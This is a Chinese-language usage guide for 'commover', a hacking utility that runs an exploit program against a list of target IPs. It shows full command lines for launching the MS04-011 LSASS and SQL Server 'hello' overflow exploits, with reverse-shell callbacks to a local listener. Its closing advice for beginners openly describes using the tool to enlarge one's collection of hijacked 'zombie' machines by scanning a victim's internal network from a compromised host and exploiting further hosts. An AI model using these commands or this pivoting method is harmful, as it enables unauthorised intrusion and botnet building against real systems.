用法: Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. Usage: commover [head] file after exp head------EXP的前缀参数(多个参数需要用双引号刮起来) file------保存攻击IP的文件的全名(.txt) after------EXP的后缀参数(多个参数需要用双引号刮起来) exp------exp的文件全名(.exe) 有前缀参数:comover 0 file.txt "1234 192.168.0.253" ms04011.exe 无前缀参数:comover file.txt "1433 192.168.0.253 1234" sqlhello.exe 具体的例子:(有前缀参数的) 比如利用MS04-011.exe,存在漏洞的主机IP存在lsass.txt中,利用返回模式进行攻击 监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:ms04011.exe 那么具体参数就是这样:comover 0(1) lsass.txt "1234 192.168.0.253" ms04011.exe 具体的例子:(无前缀参数的) 比如利用SQL 1433端口的hello溢出sqlhello.exe,存在漏洞的主机IP存在1433.txt中, 监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:sqlhello.exe 那么具体参数就是这样:comover 1433.txt "1433 192.168.0.253 1234" sqlhello.exe 大致用法就是这样,对不同的exp程序应该根据具体的EXP用法使用;
不过特别要主义的是,当前缀或者后缀参数有多个参数的时候一定要用双用好包括起来; file.txt里面一行只能保存一个IP。 写给菜鸟: 这个东西我认为用来扩大自己的肉鸡是非常有用的,比如我通过SQL的hello溢出得到 192.168.111.23的一台肉鸡,那么我们就可以通过其他的漏洞 比如MS04011,我们可以先利用rootshell写的那个scanner对其内网进行扫描,得到结 果lsass.txt 下载下来编辑去掉后面无用的信息,在传上去,然后把MS04011.EXE 传到肉鸡上面, 在利用这个commover.exe进行攻击,相信你会得到很意外的收获,哈哈!
|